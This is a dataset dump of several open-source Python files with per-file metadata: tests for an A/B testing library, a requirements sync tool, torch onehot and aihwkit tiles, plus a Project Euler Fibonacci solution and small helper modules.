| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.333333
| 12
| 3
| 8
| 4
| 0.125
| 0.416667
| 0
| null | 0
| null | 0
| 0
| null | 0
| 0
| 0
| null | 1
| null | true
| 0
| 0
| null | null | null | 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
2fe8ba30bc37895772df422c85c72258790493e4
| 2,063
|
py
|
Python
|
test/test_means_delta.py
|
quizlet/abracadabra
|
eda599bd02f14b96efdc521f53132d93c9100ede
|
[
"MIT"
] | 24
|
2020-06-12T16:12:32.000Z
|
2021-09-01T12:25:38.000Z
|
test/test_means_delta.py
|
quizlet/abracadabra
|
eda599bd02f14b96efdc521f53132d93c9100ede
|
[
"MIT"
] | 20
|
2020-06-12T06:26:08.000Z
|
2022-03-12T00:57:51.000Z
|
test/test_means_delta.py
|
quizlet/abracadabra
|
eda599bd02f14b96efdc521f53132d93c9100ede
|
[
"MIT"
] | 4
|
2020-06-14T12:14:11.000Z
|
2021-05-28T15:36:44.000Z
|
import pytest
from abra import Experiment, HypothesisTest
def test_means_delta_experiment_t(means_data):
"""Small sample sizes defautl to t-tests"""
exp = Experiment(means_data.sample(29), name='means-test')
test_ab = HypothesisTest(
metric='metric',
control='A', variation='A',
hypothesis='unequal',
inference_method='means_delta'
)
results_ab = exp.run_test(test_ab)
assert results_ab.test_statistic == 't'
def test_means_delta_experiment_unequal_ab(means_data):
exp = Experiment(means_data, name='means-test')
test_ab = HypothesisTest(
metric='metric',
control='A', variation='F',
hypothesis='unequal',
inference_method='means_delta'
)
results_ab = exp.run_test(test_ab)
assert results_ab.test_statistic == 'z'
assert results_ab.accept_hypothesis
def test_means_delta_experiment_larger_ab(means_data):
exp = Experiment(means_data, name='means-test')
test_ab = HypothesisTest(
metric='metric',
control='A', variation='F',
hypothesis='larger',
inference_method='means_delta'
)
results_ab = exp.run_test(test_ab)
assert results_ab.test_statistic == 'z'
assert results_ab.accept_hypothesis
def test_means_delta_experiment_smaller_ab(means_data):
exp = Experiment(means_data, name='means-test')
test_ab = HypothesisTest(
metric='metric',
control='A', variation='F',
hypothesis='smaller',
inference_method='means_delta'
)
results_ab = exp.run_test(test_ab)
assert results_ab.test_statistic == 'z'
assert not results_ab.accept_hypothesis
def test_means_delta_experiment_aa(means_data):
exp = Experiment(means_data, name='means-test')
test_ab = HypothesisTest(
metric='metric',
control='A', variation='A',
hypothesis='larger',
inference_method='means_delta'
)
results_ab = exp.run_test(test_ab)
assert results_ab.test_statistic == 'z'
assert not results_ab.accept_hypothesis
| 29.056338
| 62
| 0.68444
| 256
| 2,063
| 5.199219
| 0.160156
| 0.094666
| 0.075131
| 0.063862
| 0.886551
| 0.84598
| 0.84598
| 0.84598
| 0.84598
| 0.825695
| 0
| 0.001222
| 0.206495
| 2,063
| 71
| 63
| 29.056338
| 0.811851
| 0.017935
| 0
| 0.732143
| 0
| 0
| 0.090549
| 0
| 0
| 0
| 0
| 0
| 0.160714
| 1
| 0.089286
| false
| 0
| 0.035714
| 0
| 0.125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ffdf6f8d222dfa387ff18026c622b2158f54d63
| 3,842
|
py
|
Python
|
python/p002.py
|
tsghosh/eusolutions
|
705fb95f7308105aa4a7f692881200760e55b4f7
|
[
"MIT"
] | null | null | null |
python/p002.py
|
tsghosh/eusolutions
|
705fb95f7308105aa4a7f692881200760e55b4f7
|
[
"MIT"
] | null | null | null |
python/p002.py
|
tsghosh/eusolutions
|
705fb95f7308105aa4a7f692881200760e55b4f7
|
[
"MIT"
] | null | null | null |
# Solution to Project Euler problem 2
# Problem 2
# Each new term in the Fibonacci sequence is generated by adding the previous two terms. By starting with 1 and 2, the first 10 terms will be:
# 1, 2, 3, 5, 8, 13, 21, 34, 55, 89, ...
# By considering the terms in the Fibonacci sequence whose values do not exceed four million, find the sum of the even-valued terms.
#first step is create a sample to find all Fibonacci numbers bellow 10
def find_all_fibonacci_bellow_10():
start_num = 0; ## starts with 0
new_fibonacci_num = 1 ## first add to 1 to start series
new_fibonacci_num = 0 ## starts with 0
print new_fibonacci_num
new_fibonacci_num = 0 + 1
print new_fibonacci_num ## first add to 1 to start series
temp_fibonacci_A = 0
temp_fibonacci_B = 1
while(temp_fibonacci_B + temp_fibonacci_A < 10):
new_fibonacci_num = temp_fibonacci_B + temp_fibonacci_A
temp_fibonacci_A = temp_fibonacci_B
temp_fibonacci_B = new_fibonacci_num
print new_fibonacci_num
#second change our program to add all fibonacci numbers bellow 10
def find_sum_of_all_fibonacci_bellow_10():
sum = 0
start_num = 0; ## starts with 0
new_fibonacci_num = 1 ## first add to 1 to start series
new_fibonacci_num = 0 ## starts with 0
print new_fibonacci_num
new_fibonacci_num = 0 + 1
print new_fibonacci_num ## first add to 1 to start series
temp_fibonacci_A = 0
temp_fibonacci_B = 1
while(temp_fibonacci_B + temp_fibonacci_A < 10):
new_fibonacci_num = temp_fibonacci_B + temp_fibonacci_A
temp_fibonacci_A = temp_fibonacci_B
temp_fibonacci_B = new_fibonacci_num
print new_fibonacci_num
sum = sum+new_fibonacci_num
print 'Sum of all fibonacci bellow 10 :' , sum
#third add the even number filter bellow 10
def find_sum_of_all_even_fibonacci_bellow_10():
sum = 0
start_num = 0; ## starts with 0
new_fibonacci_num = 1 ## first add to 1 to start series
new_fibonacci_num = 0 ## starts with 0
print new_fibonacci_num
new_fibonacci_num = 0 + 1
print new_fibonacci_num ## first add to 1 to start series
temp_fibonacci_A = 0
temp_fibonacci_B = 1
while(temp_fibonacci_B + temp_fibonacci_A < 10):
new_fibonacci_num = temp_fibonacci_B + temp_fibonacci_A
temp_fibonacci_A = temp_fibonacci_B
temp_fibonacci_B = new_fibonacci_num
print new_fibonacci_num
if new_fibonacci_num%2==0:
sum = sum+new_fibonacci_num
print 'Sum of all EVEN fibonacci bellow 10 :' , sum
# Final solution our program add all even fibonacci bellow 4 million
def find_sum_of_all_even_fibonacci_bellow_4_millon_start_with_1_and_2():
sum = 0
new_fibonacci_num = 1 ## starts with 1
#print new_fibonacci_num
new_fibonacci_num = 2
#print new_fibonacci_num ## next num is 2 given in problem to start series
temp_fibonacci_A = 1
temp_fibonacci_B = 2
sum = 2 # 2 is even number, and one of the first 2 in the series as per rule (adding here before compute)
# 4 million is 40,00,000 (40 lakhs)
while(temp_fibonacci_B + temp_fibonacci_A < 4000000):
new_fibonacci_num = temp_fibonacci_B + temp_fibonacci_A
temp_fibonacci_A = temp_fibonacci_B
temp_fibonacci_B = new_fibonacci_num
#print new_fibonacci_num ##incase print is needed
if new_fibonacci_num % 2==0:
sum = sum+new_fibonacci_num
print 'Sum of all EVEN fibonacci bellow 4 million starts with 1 and 2 :' , sum
if __name__ == "__main__":
#find_all_fibonacci_bellow_10
#find_sum_of_all_fibonacci_bellow_10()
#find_sum_of_all_even_fibonacci_bellow_10()
find_sum_of_all_even_fibonacci_bellow_4_millon_start_with_1_and_2()
| 31.235772
| 142
| 0.706663
| 610
| 3,842
| 4.098361
| 0.157377
| 0.1728
| 0.216
| 0.096
| 0.7624
| 0.7396
| 0.714
| 0.6448
| 0.6212
| 0.6076
| 0
| 0.043029
| 0.243883
| 3,842
| 122
| 143
| 31.491803
| 0.817556
| 0.328735
| 0
| 0.784615
| 1
| 0
| 0.055731
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.184615
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff3b71bc235f8504c2e3290e1fab6abbca8b52c7
| 9,076
|
py
|
Python
|
tests/test_reqsync/driver_test.py
|
alex-ber/PythonPackageSyncTool
|
07b970dd7cb752cb7dfebc9baa06ad0210dfe9c1
|
[
"BSD-2-Clause"
] | null | null | null |
tests/test_reqsync/driver_test.py
|
alex-ber/PythonPackageSyncTool
|
07b970dd7cb752cb7dfebc9baa06ad0210dfe9c1
|
[
"BSD-2-Clause"
] | 2
|
2019-10-22T06:37:48.000Z
|
2019-10-23T10:09:42.000Z
|
tests/test_reqsync/driver_test.py
|
alex-ber/PythonPackageSyncTool
|
07b970dd7cb752cb7dfebc9baa06ad0210dfe9c1
|
[
"BSD-2-Clause"
] | null | null | null |
import logging
logger = logging.getLogger(__name__)
import pytest
from alexber.reqsync import app
from alexber.reqsync.app import logging as app_logging
from contextlib import ExitStack
from importlib.resources import path
from pathlib import Path
import yaml
from .app_test import validate_result
def _calc_removed_lines_lines(config_file):
full_path = Path(config_file).resolve()
with open(full_path) as f:
d = yaml.safe_load(f)
d = d['treeroot']
ret = d['remove']
return ret
@pytest.fixture
def skip_app_logging_reconfiguration(request, mocker):
mocker.patch.object(app_logging.config, 'dictConfig', autospec=True, spec_set=True)
@pytest.mark.it
def test_it_full_single_package(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'lxml'
exp_version = '4.3.3'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_full_single_package_exist(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'numpy'
exp_version = '1.16.2'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version} ' \
.split()
with pytest.raises(ValueError, match='Mutual_Exclusion'):
app.main(argsv)
@pytest.mark.it
def test_it_full_single_package_as_list(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'lxml'
exp_version = '4.3.3'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_full_single_package_exist_as_list(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'numpy'
exp_version = '1.16.2'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
with pytest.raises(ValueError, match='Mutual_Exclusion'):
app.main(argsv)
@pytest.mark.it
def test_it_full_single_package_last(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'zope.interface'
exp_version = '4.6.0'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_full_single_package_first(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output = file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
exp_package = 'aaa'
exp_version = '1.0.0'
exp_line = f'{exp_package}=={exp_version}'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--add={exp_package}:{exp_version}, ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
new_lines=[exp_line],
removed_lines=_calc_removed_lines_lines(exp_config_yml))
@pytest.mark.it
def test_it_remove_single_package(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
remove_package = 'numpy'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--remove={remove_package} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
removed_lines=[remove_package])
@pytest.mark.it
def test_it_remove_single_package_first(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
remove_package = 'appdirs'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--remove={remove_package} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
removed_lines=[remove_package])
@pytest.mark.it
def test_it_remove_single_package_last(request, mocker, skip_app_logging_reconfiguration):
logger.info(f'{request._pyfuncitem.name}()')
file_manager = ExitStack()
pck = '.'.join(['tests_data', __package__, 'it'])
exp_config_yml = file_manager.enter_context(
path(pck, "config.yml"))
exp_input = file_manager.enter_context(
path(pck, 'requirements-src.txt'))
exp_output= file_manager.enter_context(
path(pck, 'requirements-dest.txt'))
remove_package = 'wstools'
argsv = f'--config_file={exp_config_yml} ' \
f'--source={exp_input} ' \
f'--destination={exp_output} ' \
f'--remove={remove_package} ' \
.split()
app.main(argsv)
validate_result(
input_path=exp_input,
output_path=exp_output,
removed_lines=[remove_package])
if __name__ == "__main__":
pytest.main([__file__])
| 29.089744
| 97
| 0.6526
| 1,132
| 9,076
| 4.85689
| 0.092756
| 0.072026
| 0.078574
| 0.11295
| 0.894689
| 0.894689
| 0.894689
| 0.894689
| 0.894689
| 0.889051
| 0
| 0.00279
| 0.210115
| 9,076
| 311
| 98
| 29.18328
| 0.764123
| 0
| 0
| 0.833333
| 0
| 0
| 0.230023
| 0.14703
| 0
| 0
| 0
| 0
| 0
| 1
| 0.048246
| false
| 0
| 0.039474
| 0
| 0.092105
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff7d41863b92e53e2dfa54e263003b40ae3a52f4
| 1,601
|
py
|
Python
|
tests/unit/_torch_tests.py
|
acse-yl27218/cherry
|
5b349cae64b282facf5a874164690c06808b1c61
|
[
"Apache-2.0"
] | 160
|
2019-09-14T05:33:29.000Z
|
2022-03-12T18:58:51.000Z
|
tests/unit/_torch_tests.py
|
acse-yl27218/cherry
|
5b349cae64b282facf5a874164690c06808b1c61
|
[
"Apache-2.0"
] | 14
|
2019-12-05T12:14:05.000Z
|
2022-02-28T14:52:52.000Z
|
tests/unit/_torch_tests.py
|
acse-yl27218/cherry
|
5b349cae64b282facf5a874164690c06808b1c61
|
[
"Apache-2.0"
] | 28
|
2019-09-17T02:25:46.000Z
|
2022-03-12T19:53:58.000Z
|
#!/usr/bin/env python3
import unittest
import numpy as np
import torch as th
import cherry as ch
DIM = 5
class TestTorch(unittest.TestCase):
def test_onehot(self):
single = 3
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, single] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
single = np.int64(3)
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, single] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
single = np.float64(3.0)
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, int(single)] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
single = np.float64(3.2)
oh_single = ch.onehot(single, dim=DIM)
self.assertTrue(oh_single.size(0) == 1)
self.assertTrue(oh_single.size(1) == DIM)
ref = th.zeros(1, DIM)
ref[0, int(single)] += 1
self.assertTrue((oh_single - ref).pow(2).sum().item() == 0)
multi = th.arange(DIM)
multi = ch.onehot(multi, dim=DIM)
ref = th.eye(DIM)
self.assertTrue((multi - ref).pow(2).sum().item() == 0)
if __name__ == '__main__':
unittest.main()
| 29.648148
| 67
| 0.569644
| 234
| 1,601
| 3.790598
| 0.188034
| 0.144307
| 0.21646
| 0.297632
| 0.738444
| 0.738444
| 0.721533
| 0.721533
| 0.721533
| 0.721533
| 0
| 0.040712
| 0.263585
| 1,601
| 53
| 68
| 30.207547
| 0.71162
| 0.013117
| 0
| 0.585366
| 0
| 0
| 0.005067
| 0
| 0
| 0
| 0
| 0
| 0.317073
| 1
| 0.02439
| false
| 0
| 0.097561
| 0
| 0.146341
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff902fa35b76847bda8ee530088291407769dfaf
| 2,054
|
py
|
Python
|
tptp/frontend/plots/dummyResults.py
|
leoprover/tptp
|
a670c903bd81990a59ffa7ec19cc0666dd3b5c55
|
[
"BSD-3-Clause"
] | 6
|
2019-08-15T13:12:13.000Z
|
2021-08-09T12:07:51.000Z
|
tptp/frontend/plots/dummyResults.py
|
leoprover/tptp
|
a670c903bd81990a59ffa7ec19cc0666dd3b5c55
|
[
"BSD-3-Clause"
] | null | null | null |
tptp/frontend/plots/dummyResults.py
|
leoprover/tptp
|
a670c903bd81990a59ffa7ec19cc0666dd3b5c55
|
[
"BSD-3-Clause"
] | null | null | null |
from tptp.core import SZSStatus
from ...core import szs, ProblemWithStatus
from ...reasoning.localSolver import LocalSolverCall, LocalSolver
from ...reasoning import SolverResult, Solver
dummyResults = [
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('leo', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('leo', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.TMO), solver=LocalSolver('leo', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.TMO), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.TMO), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
SolverResult(LocalSolverCall(ProblemWithStatus(None, None, None, SZSStatus.THM), solver=LocalSolver('satallax', command=None),
timeout=None), SZSStatus.THM, 20.0, 30.0),
]
| 82.16
| 130
| 0.65628
| 211
| 2,054
| 6.388626
| 0.109005
| 0.106825
| 0.178042
| 0.320475
| 0.876855
| 0.876855
| 0.876855
| 0.876855
| 0.876855
| 0.876855
| 0
| 0.033582
| 0.217137
| 2,054
| 25
| 131
| 82.16
| 0.804726
| 0
| 0
| 0.708333
| 0
| 0
| 0.027737
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.166667
| 0
| 0.166667
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ff90ece4a103f07b6df27b55bf9a2bfde43c988b
| 220
|
py
|
Python
|
tests/checkio/home/test_pawn_brotherhood.py
|
zoido/checkio_python_solutions
|
858cc7eafbbf55c8506e14cce260d17406fbf09c
|
[
"MIT"
] | null | null | null |
tests/checkio/home/test_pawn_brotherhood.py
|
zoido/checkio_python_solutions
|
858cc7eafbbf55c8506e14cce260d17406fbf09c
|
[
"MIT"
] | 2
|
2017-10-14T17:44:17.000Z
|
2018-04-06T18:53:37.000Z
|
tests/checkio/home/test_pawn_brotherhood.py
|
zoido/checkio_python_solutions
|
858cc7eafbbf55c8506e14cce260d17406fbf09c
|
[
"MIT"
] | null | null | null |
from checkio.home.pawn_brotherhood import safe_pawns
def test_safe_pawns():
assert safe_pawns({"b4", "d4", "f4", "c3", "e3", "g5", "d2"}) == 6
assert safe_pawns({"b4", "c4", "d4", "e4", "f4", "g4", "e5"}) == 1
| 31.428571
| 70
| 0.577273
| 34
| 220
| 3.558824
| 0.705882
| 0.297521
| 0.247934
| 0.280992
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.086957
| 0.163636
| 220
| 6
| 71
| 36.666667
| 0.570652
| 0
| 0
| 0
| 0
| 0
| 0.127273
| 0
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff98eb836ce0c90a85d4172e1f3fd67543217a4a
| 295
|
py
|
Python
|
chainerrl/explorers/__init__.py
|
kiyukuta/chainerrl
|
65f53cd728cbcd233864e9bea9ee2e57d1b68b00
|
[
"MIT"
] | null | null | null |
chainerrl/explorers/__init__.py
|
kiyukuta/chainerrl
|
65f53cd728cbcd233864e9bea9ee2e57d1b68b00
|
[
"MIT"
] | null | null | null |
chainerrl/explorers/__init__.py
|
kiyukuta/chainerrl
|
65f53cd728cbcd233864e9bea9ee2e57d1b68b00
|
[
"MIT"
] | null | null | null |
from chainerrl.explorers.additive_gaussian import AdditiveGaussian # NOQA
from chainerrl.explorers.additive_ou import AdditiveOU # NOQA
from chainerrl.explorers.epsilon_greedy import ConstantEpsilonGreedy # NOQA
from chainerrl.explorers.epsilon_greedy import LinearDecayEpsilonGreedy # NOQA
| 59
| 79
| 0.864407
| 32
| 295
| 7.84375
| 0.4375
| 0.207171
| 0.350598
| 0.310757
| 0.358566
| 0.358566
| 0.358566
| 0
| 0
| 0
| 0
| 0
| 0.094915
| 295
| 4
| 80
| 73.75
| 0.940075
| 0.064407
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
92352c71c0b22b4fc5aa839f89a8f11e042ceae5
| 12,927
|
py
|
Python
|
tests/helpers/tiles.py
|
filemaster/aihwkit
|
473eda8c3c89f49acdfc2da9bd03b27e22e13b1a
|
[
"Apache-2.0"
] | null | null | null |
tests/helpers/tiles.py
|
filemaster/aihwkit
|
473eda8c3c89f49acdfc2da9bd03b27e22e13b1a
|
[
"Apache-2.0"
] | null | null | null |
tests/helpers/tiles.py
|
filemaster/aihwkit
|
473eda8c3c89f49acdfc2da9bd03b27e22e13b1a
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# (C) Copyright 2020 IBM. All Rights Reserved.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
"""Tile helpers for aihwkit tests."""
# pylint: disable=missing-function-docstring,too-few-public-methods
from aihwkit.simulator.tiles import AnalogTile, FloatingPointTile, InferenceTile
from aihwkit.simulator.configs.devices import (
IdealDevice,
ConstantStepDevice,
LinearStepDevice,
ExpStepDevice,
SoftBoundsDevice,
IOParameters,
DifferenceUnitCell,
VectorUnitCell,
TransferCompound,
ReferenceUnitCell
)
from aihwkit.simulator.configs import (
FloatingPointRPUConfig,
InferenceRPUConfig,
SingleRPUConfig,
UnitCellRPUConfig,
)
from aihwkit.simulator.rpu_base import tiles
class FloatingPoint:
"""FloatingPointTile."""
simulator_tile_class = tiles.FloatingPointTile
first_hidden_field = None
use_cuda = False
def get_rpu_config(self):
return FloatingPointRPUConfig()
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return FloatingPointTile(out_size, in_size, rpu_config, **kwargs)
class Ideal:
"""AnalogTile with IdealDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = None
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=IdealDevice())
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class ConstantStep:
"""AnalogTile with ConstantStepDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=ConstantStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class LinearStep:
"""AnalogTile with LinearStepDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
use_cuda = False
def get_rpu_config(self):
return SingleRPUConfig(device=LinearStepDevice(w_max_dtod=0, w_min_dtod=0))
def get_tile(self, out_size, in_size, rpu_config=None, **kwargs):
rpu_config = rpu_config or self.get_rpu_config()
return AnalogTile(out_size, in_size, rpu_config, **kwargs)
class SoftBounds:
"""AnalogTile with SoftBoundsDevice."""
simulator_tile_class = tiles.AnalogTile
first_hidden_field = 'max_bound'
